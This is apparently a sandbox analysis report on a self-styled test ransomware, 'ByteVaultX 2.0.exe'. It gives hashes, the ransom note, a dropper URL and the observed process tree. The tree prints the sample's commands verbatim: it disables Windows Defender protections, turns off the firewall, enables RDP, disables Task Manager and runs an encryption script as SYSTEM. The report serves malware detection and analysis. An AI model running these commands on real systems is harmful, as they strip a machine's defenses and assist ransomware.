958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2

Resubmissions

22-05-2024 15:54

240522-tca45sgd54 10

22-05-2024 15:32

19-05-2024 21:56

19-05-2024 21:54

19-05-2024 21:53

19-05-2024 20:56

18-05-2024 09:15

18-05-2024 00:54

Analysis

max time kernel
61s
max time network
71s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
19-05-2024 21:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ByteVaultX 2.0.exe
Size

9.9MB
MD5

98e3408a9432d5046691c4cc744eb244
SHA1

c1e9d2c89d2cb72ee2f0f11ef97b2cb07d070142
SHA256

958e65dedf5f42e310cbf4e7ba87ce130c2b60d95afb1da8f7390f2002f6caa2
SHA512

dd4451441a051a6e9cc1be16702aaea1ce0fee4bd78c30cde050636e573b0ec1fcae4cde654a1928c941410840b8d0f989932779fc59e7bf70ce444029e689d5
SSDEEP

196608:ShFaRIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:tGFG8S1+TtIi+Y9Z8D8CclydoPx

Score

10^/10

evasion execution ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://images.pexels.com/photos/970517/pexels-photo-970517.jpeg?cs=srgb&dl=pexels-mitja-juraja-357365-970517.jpg&fm=jpg

Extracted

Path

C:\Encrypt\encrypt.html

Ransom Note

Your Files Have Been Encrypted Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware The price for the Decryption is $0 in Bitcoin (BTC). Follow these steps to get your decryption: You Do It. But Remember this malware is Just For VMS This is a Test Ransomware Your Files Have Been Encrypted By The ByteVaultX Test-Ransomware Ask AI How to Use the Ransomware key with the decryption algorithm (in this case, the Fernet decryption algorithm) to decrypt each encrypted file. Save the decrypted data to new files or overwrite the original encrypted files if desired. You Will Also Have To install Python and cryptography Please note that the dercyption key is in the path C:\encrypt\Key.txt and please note you have infinite time For support, you can ask ai how to encrypt your data Trustet AI

Signatures

Renames multiple (144) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
15	1312	powershell.exe
16	1448	powershell.exe
17	2412	powershell.exe
19	2480	powershell.exe
20	3916	powershell.exe
21	3164	powershell.exe
22	2228	powershell.exe
23	700	powershell.exe
24	3180	powershell.exe

Disables Task Manager via registry modification
evasion

Modifies Windows Firewall 2 TTPs 43 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid	process
2764	netsh.exe
4808	netsh.exe
3320	netsh.exe
4540	netsh.exe
4972	netsh.exe
1480	netsh.exe
3672	netsh.exe
1420	netsh.exe
4924	netsh.exe
3208	netsh.exe
4296	netsh.exe
1708	netsh.exe
1684	netsh.exe
1564	netsh.exe
4712	netsh.exe
3920	netsh.exe
2656	netsh.exe
964	netsh.exe
5108	netsh.exe
2676	netsh.exe
916	netsh.exe
2216	netsh.exe
2384	netsh.exe
4688	netsh.exe
4668	netsh.exe
1532	netsh.exe
3044	netsh.exe
2004	netsh.exe
5016	netsh.exe
1016	netsh.exe
1008	netsh.exe
928	netsh.exe
1684	netsh.exe
4668	netsh.exe
4832	netsh.exe
4540	netsh.exe
4052	netsh.exe
4140	netsh.exe
1616	netsh.exe
2052	netsh.exe
3388	netsh.exe
3744	netsh.exe
3300	netsh.exe

Loads dropped DLL 12 IoCs

Processes:

ByteVaultX 2.0.exe

pid	process
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe
2076	ByteVaultX 2.0.exe

Drops desktop.ini file(s) 8 IoCs

Processes:

ByteVaultX 2.0.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	ByteVaultX 2.0.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	ByteVaultX 2.0.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
404	powershell.exe
3580	powershell.exe
2092	powershell.exe
700	powershell.exe
1728	powershell.exe
1448	powershell.exe
1708	powershell.exe
2400	powershell.exe
1312	powershell.exe
3916	powershell.exe
808	powershell.exe
2480	powershell.exe
3320	powershell.exe
5108	powershell.exe
4668	powershell.exe
4156	powershell.exe
4980	powershell.exe
2412	powershell.exe
2096	powershell.exe
2784	powershell.exe
3916	powershell.exe
2748	powershell.exe
3300	powershell.exe
3580	powershell.exe
4140	powershell.exe
236	powershell.exe
3580	powershell.exe
5100	powershell.exe
1616	powershell.exe
3012	powershell.exe
1704	powershell.exe
2384	powershell.exe
4864	powershell.exe
5096	powershell.exe
2300	powershell.exe
1900	powershell.exe
3044	powershell.exe
3572	powershell.exe
3180	powershell.exe
1096	powershell.exe
1088	powershell.exe
2504	powershell.exe
2920	powershell.exe
1208	powershell.exe
2228	powershell.exe
1736	powershell.exe
1208	powershell.exe
4188	powershell.exe
2536	powershell.exe
2980	powershell.exe
3164	powershell.exe
4012	powershell.exe
3044	powershell.exe
1900	powershell.exe
2920	powershell.exe
1424	powershell.exe
2228	powershell.exe
4260	powershell.exe
1772	powershell.exe
4156	powershell.exe
4612	powershell.exe
4436	powershell.exe
1476	powershell.exe
2480	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 5 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exemsedge.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exepowershell.exepowershell.exepowershell.exeidentity_helper.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1512	powershell.exe
1512	powershell.exe
2192	msedge.exe
2192	msedge.exe
3176	msedge.exe
3176	msedge.exe
4012	powershell.exe
4012	powershell.exe
2504	powershell.exe
2504	powershell.exe
2900	powershell.exe
2900	powershell.exe
1900	powershell.exe
1900	powershell.exe
3012	powershell.exe
3012	powershell.exe
4764	msedge.exe
4764	msedge.exe
4188	powershell.exe
4188	powershell.exe
800	powershell.exe
800	powershell.exe
800	powershell.exe
3096	powershell.exe
3096	powershell.exe
3096	powershell.exe
904	identity_helper.exe
904	identity_helper.exe
2748	powershell.exe
2748	powershell.exe
2748	powershell.exe
1424	powershell.exe
1424	powershell.exe
1424	powershell.exe
4436	powershell.exe
4436	powershell.exe
4436	powershell.exe
1312	powershell.exe
1312	powershell.exe
1312	powershell.exe
2372	powershell.exe
2372	powershell.exe
2372	powershell.exe
1448	powershell.exe
1448	powershell.exe
1448	powershell.exe
4436	powershell.exe
4436	powershell.exe
4436	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4156	powershell.exe
4156	powershell.exe
4156	powershell.exe
3044	powershell.exe
3044	powershell.exe
3044	powershell.exe
3580	powershell.exe
3580	powershell.exe
3580	powershell.exe
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

msedge.exe

pid process

3176 msedge.exe
3176 msedge.exe
3176 msedge.exe
3176 msedge.exe
3176 msedge.exe
3176 msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	3012	powershell.exe
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	4436	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	1476	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	3044	powershell.exe
Token: SeDebugPrivilege	2400	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	404	powershell.exe
Token: SeDebugPrivilege	5048	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	4612	powershell.exe
Token: SeDebugPrivilege	1208	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	1512	powershell.exe
Token: SeDebugPrivilege	1704	powershell.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	2480	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	3916	powershell.exe
Token: SeDebugPrivilege	3572	powershell.exe
Token: SeDebugPrivilege	3300	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeDebugPrivilege	4588	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	4156	powershell.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	1900	powershell.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	4864	powershell.exe
Token: SeDebugPrivilege	4260	powershell.exe

Suspicious use of FindShellTrayWindow 33 IoCs

Processes:

msedge.exe

pid	process
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe

Suspicious use of SendNotifyMessage 16 IoCs

Processes:

msedge.exe

pid	process
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe
3176	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ByteVaultX 2.0.exeByteVaultX 2.0.exemsedge.execmd.exe

description	pid	process	target process
PID 2764 wrote to memory of 2076	2764	ByteVaultX 2.0.exe	ByteVaultX 2.0.exe
PID 2764 wrote to memory of 2076	2764	ByteVaultX 2.0.exe	ByteVaultX 2.0.exe
PID 2076 wrote to memory of 1512	2076	ByteVaultX 2.0.exe	powershell.exe
PID 2076 wrote to memory of 1512	2076	ByteVaultX 2.0.exe	powershell.exe
PID 2076 wrote to memory of 4832	2076	ByteVaultX 2.0.exe	netsh.exe
PID 2076 wrote to memory of 4832	2076	ByteVaultX 2.0.exe	netsh.exe
PID 2076 wrote to memory of 1624	2076	ByteVaultX 2.0.exe	runas.exe
PID 2076 wrote to memory of 1624	2076	ByteVaultX 2.0.exe	runas.exe
PID 2076 wrote to memory of 3176	2076	ByteVaultX 2.0.exe	msedge.exe
PID 2076 wrote to memory of 3176	2076	ByteVaultX 2.0.exe	msedge.exe
PID 2076 wrote to memory of 1088	2076	ByteVaultX 2.0.exe	cmd.exe
PID 2076 wrote to memory of 1088	2076	ByteVaultX 2.0.exe	cmd.exe
PID 3176 wrote to memory of 2436	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2436	3176	msedge.exe	msedge.exe
PID 1088 wrote to memory of 3388	1088	cmd.exe	reg.exe
PID 1088 wrote to memory of 3388	1088	cmd.exe	reg.exe
PID 1088 wrote to memory of 1940	1088	cmd.exe	reg.exe
PID 1088 wrote to memory of 1940	1088	cmd.exe	reg.exe
PID 1088 wrote to memory of 2384	1088	cmd.exe	reg.exe
PID 1088 wrote to memory of 2384	1088	cmd.exe	reg.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2648	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2192	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 2192	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 3904	3176	msedge.exe	msedge.exe
PID 3176 wrote to memory of 3904	3176	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2764

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"
2⤵
- Loads dropped DLL
- Drops desktop.ini file(s)
- Suspicious use of WriteProcessMemory
PID:2076

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512

C:\Windows\SYSTEM32\netsh.exe
netsh advfirewall set allprofiles state off
3⤵
- Modifies Windows Firewall
PID:4832

C:\Windows\SYSTEM32\runas.exe
runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"
3⤵
PID:1624

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3176

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeec433cb8,0x7ffeec433cc8,0x7ffeec433cd8
4⤵
PID:2436

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:2
4⤵
PID:2648

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2428 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2192

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2832 /prefetch:8
4⤵
PID:3904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
4⤵
PID:3356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
4⤵
PID:1796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5104 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
4⤵
PID:3480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
4⤵
PID:2756

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
4⤵
PID:1732

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12932575137552841893,5802054212879381123,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:1
4⤵
PID:4748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\system32\reg.exe
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"
4⤵
PID:3388

C:\Windows\system32\reg.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
4⤵
PID:1940

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"
4⤵
PID:2384

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f
4⤵
PID:3000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableIOAVProtection $true"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Set-MpPreference -DisableScriptScanning $true"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2900

